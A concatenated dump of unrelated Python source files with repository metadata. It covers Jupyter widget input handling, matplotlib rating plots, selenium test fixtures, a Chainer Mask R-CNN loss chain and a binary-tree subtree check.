        self.widget.observe(self.handle_change, names="value")
    def edge_case(self, value):
        """
        Edge case handling for the widget. This is called within handle_change.
        Parameters
        ----------
        value: `any`
            Value of the widget
        """
        pass
    def edge_case_condition(self, value):
        """
        Edge case condition for the widget.
        Parameters
        ----------
        value: `any`
            Value of the widget
        Returns
        -------
        `bool`
            `True` if the value is an edge case, `False` otherwise
        """
        # Base implementation: no edge cases; subclasses override.
        return False
    def try_change_value(self, value):
        """
        Set property_name in values_container to value.
        Parameters
        ----------
        value: `any`
            Value to be set
        """
        self.values_cont[self.property_name] = value
    def display_error(self, value):
        """
        Handle invalid input provide realtime validation.
        Parameters
        ----------
        value: `any`
            Value of the widget
        """
        if self.widget:
            # Mark the widget visually and invalidate the stored value so
            # downstream computation sees the parameter as missing.
            self.widget.layout.border = ERROR_STYLE
            self.widget.description = f"Invalid {self.property_alias}"
            self.values_cont[self.property_name] = None
    def convert_to_unit(self, change):
        """
        Convert the value of the widget to the unit specified by the dropdown.
        Parameters
        ----------
        change: `any`
            New value of the widget
        Returns
        -------
        `any`
            Value of the widget in the unit specified by the dropdown
        """
        return change.new * self.unit if self.unit else change.new
    def attach_units_dropdown(self, options):
        """
        Special method that attaches dropdown widget to the input widget,
        and handles the change event of the dropdown widget.
        Parameters
        ----------
        options: `list`
            List of units to be displayed in the dropdown widget
        """
        self.units_dropdown = widgets.Dropdown(
            options=options, value=options[0], layout=widgets.Layout(width="100px")
        )
        self.units_dropdown.observe(self.handle_dropdown_change, names="value")
    def handle_dropdown_change(self, change):
        """
        Handle change event of the dropdown widget.
        Parameters
        ----------
        change: `any`
            New value of the dropdown widget
        """
        self.set_unit(self.units_dropdown.value)
        # Re-tag the already-stored value with the newly selected unit.
        if self.property_name in self.values_cont:
            self.values_cont[self.property_name] = (
                self.values_cont[self.property_name].value * self.unit
            )
    def handle_change(self, change):
        """
        Handle change event of the widget, follows same process
        for all widgets.
        Gets the new value with units, checks for invalid input,
        edge case and updates values_container accordingly.
        Parameters
        ----------
        change: `any`
            New value of the widget
        """
        value = self.convert_to_unit(change)
        if self.edge_case_condition(value):
            self.edge_case(value)
        else:
            try:
                self.try_change_value(value)
            except Exception:
                # Any parse/validation failure becomes a visual error state
                # rather than an exception propagating into the event loop.
                self.display_error(value)
class _FloatBox(_GenericWidget):
    """
    Derived from _GenericWidget, a FloatBox input widget
    with incremental options.

    Parameters
    ----------
    property_name: `str`
        Name of the property the widget is associated with.
    min: `float`
        Minimum value the widget can take
    max: `float`
        Maximum value the widget can take
    """

    def __init__(self, property_name, min=-1e50, max=1e50):
        super().__init__(property_name)
        self.min = min
        self.max = max

    def create_widget(self, style=None):
        """
        Implements create_widget. description_width is set to initial
        to make the widget as wide as possible.

        Parameters
        ----------
        style: `dict`, optional
            ipywidgets style mapping; defaults to
            ``{"description_width": "initial"}``.
        """
        # BUG FIX: the default used to be a mutable dict literal in the
        # signature (shared across all calls); build it per call instead.
        if style is None:
            style = {"description_width": "initial"}
        self.widget = widgets.BoundedFloatText(
            name=self.property_name,
            min=self.min,
            max=self.max,
            value=0,
            step=0.1,
            style=style,
        )
        self.post_creation()
class _CheckBox(_GenericWidget):
    """
    A boolean (checkbox) input widget derived from _GenericWidget.

    Parameters
    ----------
    property_name: `str`
        Key under which the widget's value is stored in the values container.
    """

    def __init__(self, property_name):
        super().__init__(property_name)

    def create_widget(self):
        """Create the underlying ipywidgets Checkbox, unchecked by default."""
        checkbox = widgets.Checkbox(value=False)
        self.widget = checkbox
        self.post_creation()
class _ParticleBox(_GenericWidget):
    """
    Derived from _GenericWidget, input widget specific for particle
    name.

    Parameters
    ----------
    property_name: `str`
        Name of the property the widget is associated with.
    property_alias: `str`
        Alias of the property the widget is associated with.
        (particle_type in this case)
    """

    def __init__(self, property_name, property_alias=None):
        super().__init__(property_name, property_alias=property_alias)

    def edge_case_condition(self, value):
        """
        Edge case for particle box, checks if value is empty.

        Parameters
        ----------
        value: `str`
            Value of the widget

        Returns
        -------
        `bool`
            `True` if the value is empty, `False` otherwise
        """
        return value is None or value == ""

    def edge_case(self, value):
        """
        Edge case to handle empty value of particle box:
        resets the container value to `None`, and resets the error status.
        """
        self.values_cont[self.property_name] = None
        self.widget.description = ""
        self.widget.layout.border = ""

    def try_change_value(self, value):
        """
        Set property_name in values_container to the parsed particle,
        and reset the error status.

        Parameters
        ----------
        value: `str`
            Value to be set

        Raises
        ------
        `~plasmapy.particles.exceptions.InvalidParticleError`
            Raised when the particle input does not correspond to a valid
            particle or is contradictory.
        """
        particle = Particle(value)
        self.values_cont[self.property_name] = particle
        self.widget.layout.border = ""
        self.widget.description = ""

    def create_widget(self, style=None):
        """
        Implements create_widget; creates a free-text input field.

        Parameters
        ----------
        style: `dict`, optional
            ipywidgets style mapping; defaults to
            ``{"description_width": "initial"}`` to make the widget as
            wide as possible.
        """
        # BUG FIX: avoid the mutable dict default argument that used to be
        # shared across every call; build the default per call instead.
        if style is None:
            style = {"description_width": "initial"}
        self.widget = widgets.Text(style=style)
        self.post_creation()
class _IonBox(_ParticleBox):
    """
    Input widget for ions; extends _ParticleBox with ion-specific validation.

    Parameters
    ----------
    property_name: `str`
        Key under which the widget's value is stored in the values container.
    property_alias: `str`
        Human-readable alias shown in validation error messages.
    """

    def __init__(self, property_name, property_alias=None):
        super().__init__(property_name, property_alias=property_alias)

    def try_change_value(self, value):
        """
        Parse ``value`` as a particle, reject anything that is not an ion,
        then store the ion and clear any error decoration on the widget.

        Parameters
        ----------
        value: `str`
            Value to be set

        Raises
        ------
        `~plasmapy.particles.exceptions.InvalidParticleError`
            Raised when the input does not correspond to a valid particle
            or is contradictory.
        `ValueError`
            Raised when the input is a valid particle but not an ion.
        """
        candidate = Particle(value)
        if not candidate.is_ion:
            raise ValueError(f"{candidate} is not an ion")
        self.values_cont[self.property_name] = candidate
        self.widget.layout.border = ""
        self.widget.description = ""
class _FunctionInfo:
    """
    Class to store information about a function. Gets the function's parameters,
    and uses to process input based on function signature.
    Parameters
    ----------
    module_name: `str`
        Name of the module the function is in
    function_name: `str`
        Name of the function
    values_container: `dict`
        Reference to global dictionary of values to be passed to the function
    """
    def __init__(self, module_name, function_name, values_cont=values_container):
        self.module = module_name
        self.fname = function_name
        # Resolve the callable by name at construction time.
        self.fattr = getattr(importlib.import_module(module_name), function_name)
        self.values_cont = values_cont
        self.spec_combo = None
        # Ordered parameter names from the function's signature.
        self.sig = list(signature(self.fattr).parameters.keys())
        self.output_widget = widgets.Output()
        self.output_widget.layout.margin = EQUAL_SPACING_CONFIG
        self.output_widget.layout.padding = EQUAL_SPACING_CONFIG
    def add_combo(self, spec_combo):
        """
        Specify selective combination of parameters to be used in the function,
        This is the case for few functions where having all parameters doesn't yield
        output.
        Parameters
        ----------
        spec_combo: `list`
            List of parameters to be used in the function
        Example
        -------
        For plasmapy.formulary.gyroradius the specific combo's are as follows:
        ["B","particle","Vperp"] and ["B","particle","T"]
        """
        if not self.spec_combo:
            self.spec_combo = []
        self.spec_combo.append(spec_combo)
    def get_output_widget(self):
        """
        Returns the output widget of the function.
        Returns
        -------
        `~ipywidgets.widgets.Output`
            Output widget of the function
        """
        return self.output_widget
    def produce_arg(self, spec):
        """
        Prepares a dictionary of arguments that is present in both values_container,
        and in spec.
        Parameters
        ----------
        spec: `list`
            List of parameters to be used in the function
        Returns
        -------
        `dict`
            Dictionary of arguments that is available
        """
        return {
            arg: self.values_cont[arg]
            for arg in spec
            if arg in self.values_cont and self.values_cont[arg] is not None
        }
    def error_message(self, spec):
        """
        Generates an error message for the function when parameters are missing.
        Parameters
        ----------
        spec: `list`
            List of parameters to be used in the function
        """
        # Print each parameter colour-coded: green = provided, red = missing.
        print(_colored_text(BLACK, "["), end="")
        for arg in spec:
            if arg in self.values_cont and self.values_cont[arg] is not None:
                print(_colored_text(LIGHT_GREEN, f"{arg}:present,"), end="")
            else:
                print(_colored_text(DARK_RED, f"{arg}:missing,"), end="")
        print(_colored_text(BLACK, "]"))
    def process(self):
        """
        Processes the function based on signatures and spec_combo provided.
        Spec_combo is prioritized over the function signature.
        """
        self.output_widget.clear_output()
        args_dict = {}
        if self.spec_combo:
            # Use the first combo whose parameters are all available; if none
            # is complete, the last (partial) dict falls through and the call
            # below fails into the error branch.
            for spec in self.spec_combo:
                args_dict = self.produce_arg(spec)
                if len(args_dict) == len(spec):
                    break
        else:
            args_dict = self.produce_arg(self.sig)
        with self.output_widget:
            try:
                self.output_widget.layout.border = "0px"
                print(f" : {str(self.fattr(**args_dict))}")
            except Exception as e:
                # Show the exception plus a per-parameter present/missing
                # breakdown so the user can see what to fill in.
                self.output_widget.layout.border = ERROR_STYLE
                print(e)
                print(
                    " : could not be computed one or more parameter is missing - check below for missing parameters"
                )
                if self.spec_combo:
                    for spec in self.spec_combo:
                        self.error_message(spec)
                else:
                    self.error_message(self.sig)
def _create_label(label, color="black"):
    """
    Creates a label widget with the given text and color.

    Parameters
    ----------
    label: `str`
        Text of the label
    color: `str`
        Color of the label, defaults to black

    Returns
    -------
    `~ipywidgets.widgets.HTML`
        HTML widget rendering the label as an <h3> heading
    """
    # This is done so voila switches colors according to theme
    color_param = f"color:{color}" if color != "black" else ""
    # Bug fix: the heading was closed with "<h3>" instead of "</h3>",
    # leaving an unclosed tag in the rendered HTML.
    return widgets.HTML(f"<h3 style='margin:0px;{color_param}'>{label}</h3>")
def _handle_button_click(event):
    """
    Handles the click event of the calculate properties button:
    every queued function is (re)evaluated.
    """
    for queued_fn in _process_queue:
        queued_fn.process()
def _handle_clear_click(event):
    """
    Handles the click event of the clear properties button:
    the output widget of every queued function is wiped.
    """
    for queued_fn in _process_queue:
        queued_fn.output_widget.clear_output()
def _colored_text(color, text):
"""
Prepares an inline string with the given color.
Parameters
----------
color: `list`
RGB color of the text
text: `str`
Text to be colored
Returns
-------
`str`
Colored text
"""
return f"\033[38;2;{color[0]};{color[1]};{color[2]}m{text} \033[38;2;255;255;255m"
# Module-level action buttons shared by the UI, wired to the handlers above.
_calculate_button = widgets.Button(
    description="Calculate Properties", button_style="info"
)
_calculate_button.on_click(_handle_button_click)
_clear_button = widgets.Button(description="Clear Output", button_style="danger")
_clear_button.on_click(_handle_clear_click)
def _create_widget(widget_type, **kwargs):
"""
Creates a widget of the given type with the given parameters.
Widget can be with/without units dropdown.
Parameters
----------
widget_type: `any`
Type of the widget to be created
**kwargs: `dict`
Parameters specific to the widget
Returns
-------
`~ipywidgets.widgets.Widget or [~ipywidgets.widgets.Widget, ~ipywidgets.widgets.Widget]`
widget or [widget, units_dropdown]
"""
unit = None
placeholder = None
opts = None
if "unit" in kwargs:
unit = kwargs["unit"]
del kwargs["unit"]
if "placeholder" in kwargs:
placeholder = kwargs["placeholder"]
del kwargs["placeholder"]
if "opts" in kwargs:
opts = kwargs["opts"]
del kwargs["opts"]
widget_element = widget_type(**kwargs)
widget_element.create_widget()
if unit:
widget_element.set_unit(unit)
if placeholder:
widget_element.set_place_holder(placeholder)
if opts:
widget_element.attach_units_dropdown(opts)
return [widget_element.get_widget(), widget_element.get_dropdown_widget()]
else:
return widget_element.get_widget()
| [
"noreply@github.com"
] | noreply@github.com |
d857d210c85ab7e5b44aa427f2403019ebe176a1 | f08d137b7821d79672c91e5f06967ffa1f90e278 | /.history/Python/Main_py_20211021101357.py | 24180ebf2cf62ee0838fe71a2cd46e81d5e858e6 | [] | no_license | anhviet-key/hello-cac-ban | a39ffb1731a77dd171523ea145f5d8b62fccde7c | 18411b51add7e3277d42869f8a50c67111337983 | refs/heads/main | 2023-08-23T09:02:01.074958 | 2021-10-27T07:48:47 | 2021-10-27T07:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from Sub_py import emailProcess, print_Mess
def main():
    """Run the demo email processor over a few sample addresses."""
    emails = ["hello.vi@gmail.com", "Package@yahoo.com", "Test@gmail.dev"]
    for email in emails:
        # Bug fix: the original called `usemailProcess`, which is not
        # defined anywhere; the imported helper is `emailProcess`.
        emailProcess(email)
if __name__ == "__main__":
    # Run the demo only when executed as a script, not on import.
    main()
| [
"92666546+anhviet-key@users.noreply.github.com"
] | 92666546+anhviet-key@users.noreply.github.com |
a7da83c154c9480e68fc45b27de2fc75c7bd51ce | 5bfd97b3ed5b173af6d97cbed91fe4cbeb9d5690 | /901_recommendation/plots.py | 6b573a9702b23a39ebbe973c8ec8bab6096177b4 | [] | no_license | AndersonJo/python-lab | dce6c1e96313ce339153c3aaf13b052581113726 | eafbeddc7a7706377478282252806de3a56cc5bb | refs/heads/master | 2020-03-22T20:54:26.708450 | 2018-10-30T05:56:50 | 2018-10-30T05:56:50 | 140,641,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | from random import uniform
import pylab as p
from data import critics
def display_critics(name1, name2):
    """
    Plot the two critics' movie scores against each other.

    @param name1 (str): the name of a critic (x axis)
    @param name2 (str): the name of a critic (y axis)
    """
    movies1 = critics.get(name1, None)
    movies2 = critics.get(name2, None)
    # Bug fix: dict.has_key() only exists in Python 2; the `in` operator
    # is equivalent and works on both Python 2 and 3.
    si_names = [n for n in movies1 if n in movies2]
    _init_plot()
    p.xlabel(name1)
    p.ylabel(name2)
    for m_name in si_names:
        score1 = movies1[m_name]
        score2 = movies2[m_name]
        # Small random jitter so coincident points remain distinguishable.
        r = uniform(0, 0.2)
        p.plot(score1, score2 + r, 'D')
        p.text(score1, score2 + r, m_name)
    p.show()
def display_all_critics():
    """Plot a pairwise score chart for every ordered pair of distinct critics."""
    for first in critics:
        for second in critics:
            if first != second:
                display_critics(first, second)
def display_movies(movie1, movie2):
    """
    Plot each critic's scores for two movies against each other.

    @param movie1 (str): the name of a movie (x axis)
    @param movie2 (str): the name of a movie (y axis)
    """
    _init_plot()
    p.xlabel(movie1)
    p.ylabel(movie2)
    # Bug fix: dict.has_key() only exists in Python 2; the `in` operator
    # is equivalent and works on both Python 2 and 3.
    critic_names = [name for name, scores in critics.items()
                    if movie1 in scores and movie2 in scores]
    for c_name in critic_names:
        a_score = critics[c_name][movie1]
        b_score = critics[c_name][movie2]
        # Small random jitter so coincident points remain distinguishable.
        p.plot(a_score + uniform(0, 0.1), b_score + uniform(0, 0.1), '^')
        p.text(a_score, b_score + uniform(0, 0.3), c_name.split(' ')[0])
    p.show()
def display_all_movies():
    """Plot a pairwise chart for every ordered pair of distinct movies."""
    # Collect the unique movie titles, preserving first-seen order.
    titles = []
    for scores in critics.values():
        for title in scores:
            if title not in titles:
                titles.append(title)
    for first in titles:
        for second in titles:
            if first == second:
                continue
            display_movies(first, second)
def _init_plot():
    """Open figure 1 with a grid and 0-6 axes ticked every 0.5."""
    p.figure(1)
    p.grid()
    p.xlim(0, 6)
    p.ylim(0, 6)
    tick_positions = p.arange(0, 6, 0.5)
    p.xticks(tick_positions, tick_positions)
    p.yticks(tick_positions, tick_positions)
"a141890@gmail.com"
] | a141890@gmail.com |
e782fadcca8915536908baee95741f6ecdf8ee5d | 63d1f90e4f32cc179635b50597fb264d77a8149d | /ceaos/__init__.py | ee66221e89d5f6cc061a3f4472e5abad0e404b7b | [] | no_license | kxu11235/cea-os | 6474fbfd0cd632d40693f472abf5c7f700ab9772 | 851639a609a4a238bbefedf191a8d0eaf567ed20 | refs/heads/main | 2023-06-01T07:39:30.098497 | 2021-06-09T16:43:47 | 2021-06-09T16:43:47 | 375,759,475 | 0 | 0 | null | 2021-06-10T16:15:44 | 2021-06-10T16:15:43 | null | UTF-8 | Python | false | false | 71 | py | # CEA-OS is an operating system for controlled environment agriculture
| [
"nandan.t@live.com"
] | nandan.t@live.com |
89315f19c44ce6a4e4989a4db8b8892a9ebb7e53 | d154b2c87c1ac29b008acbcfe7dbf1f904f72840 | /FirstLab/venv/Scripts/pip3-script.py | 8a1386c20815cc18abfa22301321e849233b9caf | [] | no_license | sophiacrumb/BDAS | 4cb1ede2022f7ef49e182be2ecb7a21faedff1f5 | 02576e057c7835ff506eb68eb9fccdc952e078f1 | refs/heads/main | 2022-12-31T08:07:55.880154 | 2020-10-20T16:13:45 | 2020-10-20T16:13:45 | 303,101,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | #!D:\PycharmProjects\FirstLab\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Auto-generated pip console-script shim: strip the "-script.py"/".exe"
    # suffix from argv[0], then dispatch to pip's console_scripts entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
    )
| [
"sophiacrumb@yandex.ru"
] | sophiacrumb@yandex.ru |
596b45507c8239328799775cbfed3e1258342f5c | 11f5ff0c46b1ed0d89a2b582bea6d91432563ff2 | /conftest.py | f560e935abaee6394bf5fff41d6d6f7d26baa25d | [] | no_license | hfridland/test_items | 829e76ba7cf66cd2d417a1033e7d47425f029e2a | f335c97dc1e26a706f05c6cd26e58804dce61da9 | refs/heads/main | 2023-05-22T10:49:16.537579 | 2021-06-05T18:45:17 | 2021-06-05T18:45:17 | 374,188,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | import pytest
from selenium import webdriver
def pytest_addoption(parser):
    """Register the --language CLI option consumed by the ``language`` fixture."""
    parser.addoption('--language', action='store', default=None,
                     help="Choose user language")
@pytest.fixture(scope="function")
def browser(request):
    """Provide a fresh Chrome WebDriver per test; quit it on teardown."""
    browser = webdriver.Chrome()
    yield browser
    # Teardown: runs after the test regardless of outcome.
    browser.quit()
@pytest.fixture(scope="function")
def language(request):
    """Expose the value of the --language CLI option to tests."""
    return request.config.getoption("language")
| [
"hfridland@shaw.ca"
] | hfridland@shaw.ca |
d00a26baca490f31f439effc72c908cdb5f1a988 | f8bdc46409c9f5eaf3d85ef157260589462d941a | /demos/instance_occlsegm/instance_occlsegm_lib/contrib/instance_occlsegm/models/mask_rcnn/mask_rcnn_train_chain.py | dcac6d9a34651571c6619b60979f08467e428520 | [
"MIT",
"BSD-3-Clause"
] | permissive | start-jsk/jsk_apc | 2e268f8b65e9d7f4f9cc4416dc8383fd0a7b9750 | c4e349f45ef38457dc774e33f6902acf1a1540a6 | refs/heads/master | 2023-09-05T09:06:24.855510 | 2023-09-01T17:10:12 | 2023-09-01T17:10:12 | 25,620,908 | 36 | 25 | NOASSERTION | 2023-09-01T17:10:14 | 2014-10-23T05:28:31 | Common Lisp | UTF-8 | Python | false | false | 9,218 | py | # Modified works:
# --------------------------------------------------------
# Copyright (c) 2017 - 2018 Kentaro Wada.
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
# This is modified work of FasterRCNNTrainChain:
# --------------------------------------------------------
# Copyright (c) 2017 Preferred Networks, Inc.
# Licensed under The MIT License [see LICENSE for details]
# https://github.com/chainer/chainercv
# --------------------------------------------------------
import numpy as np
import chainer
from chainer import cuda
import chainer.functions as F
from chainercv.links.model.faster_rcnn.utils.anchor_target_creator import\
AnchorTargetCreator
from .utils import ProposalTargetCreator
class MaskRCNNTrainChain(chainer.Chain):

    """Calculate losses for Mask R-CNN and report them.

    This is used to train Mask R-CNN in the joint training scheme
    [#FRCNN]_.

    The losses include:

    * :obj:`rpn_loc_loss`: The localization loss for \
        Region Proposal Network (RPN).
    * :obj:`rpn_cls_loss`: The classification loss for RPN.
    * :obj:`roi_loc_loss`: The localization loss for the head module.
    * :obj:`roi_cls_loss`: The classification loss for the head module.
    * :obj:`roi_mask_loss`: The per-pixel mask loss for the mask branch.

    .. [#FRCNN] Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun. \
    Faster R-CNN: Towards Real-Time Object Detection with \
    Region Proposal Networks. NIPS 2015.

    Args:
        mask_rcnn: A Mask R-CNN model that is going to be trained.
        rpn_sigma (float): Sigma parameter for the localization loss
            of Region Proposal Network (RPN). The default value is 3,
            which is the value used in [#FRCNN]_.
        roi_sigma (float): Sigma parameter for the localization loss of
            the head. The default value is 1, which is the value used
            in [#FRCNN]_.
        anchor_target_creator: An instantiation of
            :obj:`chainercv.links.model.faster_rcnn.AnchorTargetCreator`.
        proposal_target_creator: An instantiation of
            :obj:`ProposalTargetCreator` (local `.utils` variant that also
            produces ground-truth masks).

    """

    def __init__(self, mask_rcnn, rpn_sigma=3., roi_sigma=1.,
                 anchor_target_creator=AnchorTargetCreator(),
                 proposal_target_creator=ProposalTargetCreator(),
                 ):
        # NOTE(review): the creator defaults are instantiated once at class
        # definition time and shared across all train chains — presumably
        # they are stateless; confirm before reusing concurrently.
        super(MaskRCNNTrainChain, self).__init__()
        with self.init_scope():
            self.mask_rcnn = mask_rcnn
        self.rpn_sigma = rpn_sigma
        self.roi_sigma = roi_sigma

        self.anchor_target_creator = anchor_target_creator
        self.proposal_target_creator = proposal_target_creator

        self.loc_normalize_mean = mask_rcnn.loc_normalize_mean
        self.loc_normalize_std = mask_rcnn.loc_normalize_std

    def __call__(self, imgs, bboxes, labels, masks, scales):
        """Forward Mask R-CNN and calculate losses.

        Here are notations used.

        * :math:`N` is the batch size.
        * :math:`R` is the number of bounding boxes per image.

        Args:
            imgs (~chainer.Variable): A variable with a batch of images.
            bboxes (~chainer.Variable): A batch of bounding boxes.
                Its shape is :math:`(N, R, 4)`.
            labels (~chainer.Variable): A batch of labels.
                Its shape is :math:`(N, R)`. The background is excluded from
                the definition, which means that the range of the value
                is :math:`[0, L - 1]`. :math:`L` is the number of foreground
                classes.
            masks: A batch of per-instance ground-truth masks, one entry
                per image, consumed by the proposal target creator.
            scales (float or ~chainer.Variable): Amount of scaling applied to
                each raw image during preprocessing.

        Returns:
            chainer.Variable:
            Scalar loss variable.
            This is the sum of losses for Region Proposal Network and
            the head module (including the mask branch).

        """
        # Unwrap chainer.Variable inputs to raw arrays.
        if isinstance(bboxes, chainer.Variable):
            bboxes = bboxes.data
        if isinstance(labels, chainer.Variable):
            labels = labels.data
        if isinstance(scales, chainer.Variable):
            scales = scales.data
        scales = cuda.to_cpu(scales)

        batch_size, _, H, W = imgs.shape
        img_size = (H, W)

        features = self.mask_rcnn.extractor(imgs)
        rpn_locs, rpn_scores, rois, roi_indices, anchor = self.mask_rcnn.rpn(
            features, img_size, scales)

        # Skip the iteration entirely if any image has no ground truth boxes.
        if any(len(b) == 0 for b in bboxes):
            return chainer.Variable(self.xp.array(0, dtype=np.float32))

        # Sample proposals and build per-ROI targets image by image.
        batch_indices = range(batch_size)
        sample_rois = []
        sample_roi_indices = []
        gt_roi_locs = []
        gt_roi_labels = []
        gt_roi_masks = []
        for batch_index, bbox, label, mask in \
                zip(batch_indices, bboxes, labels, masks):
            roi = rois[roi_indices == batch_index]
            sample_roi, gt_roi_loc, gt_roi_label, gt_roi_mask = \
                self.proposal_target_creator(roi, bbox, label, mask)
            del roi
            sample_roi_index = self.xp.full(
                (len(sample_roi),), batch_index, dtype=np.int32)
            sample_rois.append(sample_roi)
            sample_roi_indices.append(sample_roi_index)
            del sample_roi, sample_roi_index
            gt_roi_locs.append(gt_roi_loc)
            gt_roi_labels.append(gt_roi_label)
            gt_roi_masks.append(gt_roi_mask)
            del gt_roi_loc, gt_roi_label, gt_roi_mask

        sample_rois = self.xp.concatenate(sample_rois, axis=0)
        sample_roi_indices = self.xp.concatenate(sample_roi_indices, axis=0)
        gt_roi_locs = self.xp.concatenate(gt_roi_locs, axis=0)
        gt_roi_labels = self.xp.concatenate(gt_roi_labels, axis=0)
        gt_roi_masks = self.xp.concatenate(gt_roi_masks, axis=0)

        roi_cls_locs, roi_scores, roi_masks = self.mask_rcnn.head(
            features, sample_rois, sample_roi_indices)

        # RPN losses
        gt_rpn_locs = []
        gt_rpn_labels = []
        # rpn_loc/rpn_score are unused here; the loop only iterates per image.
        for bbox, rpn_loc, rpn_score in zip(bboxes, rpn_locs, rpn_scores):
            gt_rpn_loc, gt_rpn_label = self.anchor_target_creator(
                bbox, anchor, img_size)
            gt_rpn_locs.append(gt_rpn_loc)
            gt_rpn_labels.append(gt_rpn_label)
            del gt_rpn_loc, gt_rpn_label
        gt_rpn_locs = self.xp.concatenate(gt_rpn_locs, axis=0)
        gt_rpn_labels = self.xp.concatenate(gt_rpn_labels, axis=0)
        rpn_locs = F.concat(rpn_locs, axis=0)
        rpn_scores = F.concat(rpn_scores, axis=0)
        rpn_loc_loss = _fast_rcnn_loc_loss(
            rpn_locs, gt_rpn_locs, gt_rpn_labels, self.rpn_sigma)
        rpn_cls_loss = F.sigmoid_cross_entropy(rpn_scores, gt_rpn_labels)

        # Losses for outputs of the head.
        n_sample = len(roi_cls_locs)
        roi_cls_locs = roi_cls_locs.reshape((n_sample, -1, 4))
        # Pick the predicted loc of each ROI's ground-truth class.
        roi_locs = roi_cls_locs[self.xp.arange(n_sample), gt_roi_labels]
        roi_loc_loss = _fast_rcnn_loc_loss(
            roi_locs, gt_roi_locs, gt_roi_labels, self.roi_sigma)
        roi_cls_loss = F.softmax_cross_entropy(roi_scores, gt_roi_labels)

        # Losses for outputs of mask branch.
        n_instance, n_fg_class_x_n_mask_class, roi_H, roi_W = roi_masks.shape
        assert n_sample == n_instance
        n_fg_class = self.mask_rcnn.n_class - 1
        n_mask_class = n_fg_class_x_n_mask_class // n_fg_class
        roi_masks = roi_masks.reshape(
            (n_instance, n_mask_class, n_fg_class, roi_H, roi_W)
        )
        # Softmax over the mask classes of each ROI's ground-truth class
        # (gt labels are 1-based; 0 is background, hence the -1 shift).
        roi_mask_loss = F.softmax_cross_entropy(
            roi_masks[np.arange(n_instance), :, gt_roi_labels - 1, :, :],
            gt_roi_masks,
        )
        # roi_mask_loss = F.sigmoid_cross_entropy(
        #     roi_masks[np.arange(n_sample), gt_roi_labels - 1, :, :],
        #     gt_roi_masks)

        loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss + \
            roi_mask_loss
        chainer.reporter.report({'rpn_loc_loss': rpn_loc_loss,
                                 'rpn_cls_loss': rpn_cls_loss,
                                 'roi_loc_loss': roi_loc_loss,
                                 'roi_cls_loss': roi_cls_loss,
                                 'roi_mask_loss': roi_mask_loss,
                                 'loss': loss},
                                self)
        return loss
def _smooth_l1_loss(x, t, in_weight, sigma):
    """Weighted smooth-L1 loss: quadratic near zero, linear beyond 1/sigma^2."""
    inv_width = sigma ** 2
    residual = in_weight * (x - t)
    abs_residual = F.absolute(residual)
    # 1.0 where the residual falls in the quadratic region, 0.0 elsewhere.
    in_quadratic = (abs_residual.data < (1. / inv_width)).astype(np.float32)
    per_elem = (in_quadratic * (inv_width / 2.) * F.square(residual) +
                (1 - in_quadratic) * (abs_residual - 0.5 / inv_width))
    return F.sum(per_elem)
def _fast_rcnn_loc_loss(pred_loc, gt_loc, gt_label, sigma):
    """Localization loss over positive ROIs, averaged over all labeled ROIs."""
    xp = chainer.cuda.get_array_module(pred_loc)
    weight = xp.zeros_like(gt_loc)
    # Localization loss is calculated only for positive rois.
    weight[gt_label > 0] = 1
    total = _smooth_l1_loss(pred_loc, gt_loc, weight, sigma)
    # Normalize by total number of negative and positive rois.
    return total / xp.sum(gt_label >= 0)
| [
"www.kentaro.wada@gmail.com"
] | www.kentaro.wada@gmail.com |
9afaba937a03de22be796a6bd07f246a6dced59f | 42b4211e959b797ba23089b70242ce7ba591c65b | /572_Subtree_of_Another_Tree.py | 21c7cb567a7173cbf2f7797c287c716fa73fd23e | [] | no_license | shauryasrivatava/devsnest_dsa | 7699de2f0707f27785137a72280b20ad5ddcd789 | 01274b1d2d623677a7512276599647ee5222bb6b | refs/heads/main | 2023-05-04T05:05:32.237159 | 2021-05-18T18:46:36 | 2021-05-18T18:46:36 | 348,429,262 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
def same(s, t):
    """Return True when the trees rooted at s and t have identical
    structure and equal node values."""
    if s is None and t is None:
        return True
    if s is None or t is None:
        return False
    # Both nodes exist here, so the redundant `if s and t:` guard and the
    # dead commented-out variant from the original were removed.
    return s.val == t.val and same(s.left, t.left) and same(s.right, t.right)
class Solution:
    def isSubtree(self, s: TreeNode, t: TreeNode) -> bool:
        """Return True if t occurs as a subtree (same structure and
        values) rooted at some node of s."""
        # An empty source tree cannot contain anything.
        if s is None:
            return False
        return (same(s, t)
                or self.isSubtree(s.left, t)
                or self.isSubtree(s.right, t))
| [
"noreply@github.com"
] | noreply@github.com |
4faf1c90487d459da70158af665f0ebc2c9cf364 | d75fc0ae459066bfb15187d1c902e22000153dc4 | /TestScript/tenderverificationONSupplierStatus.py | 44e27edee4b8c97a036372329b6aa5c7f6dc4e37 | [] | no_license | sureshkumarkadi/Project | 875a05a752164ff9620286ab8261c7774acc4f27 | 4652edfa6ac47d6f44bd41e03314d96753e09d92 | refs/heads/master | 2020-03-25T19:52:23.124215 | 2018-08-09T05:28:08 | 2018-08-09T05:28:08 | 144,104,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,308 | py | #-------------------------------------------------------------------------------
# Name: module2
# Purpose:
#
# Author: mathew.jacob
#
# Created: 25/08/2016
# Copyright: (c) mathew.jacob 2016
# Licence: <your licence>
#-------------------------------------------------------------------------------
from selenium.webdriver.support.ui import WebDriverWait
import unittest
import sys
import os
import time
import traceback
dir_path = os.path.dirname(os.path.realpath(__file__))
folder_path=os.path.abspath(os.path.join(dir_path, os.pardir))
sys.path.insert(0,folder_path+"\Library")
sys.path.insert(0,folder_path+"\Syslibrary")
sys.path.insert(0,folder_path+"\Data")
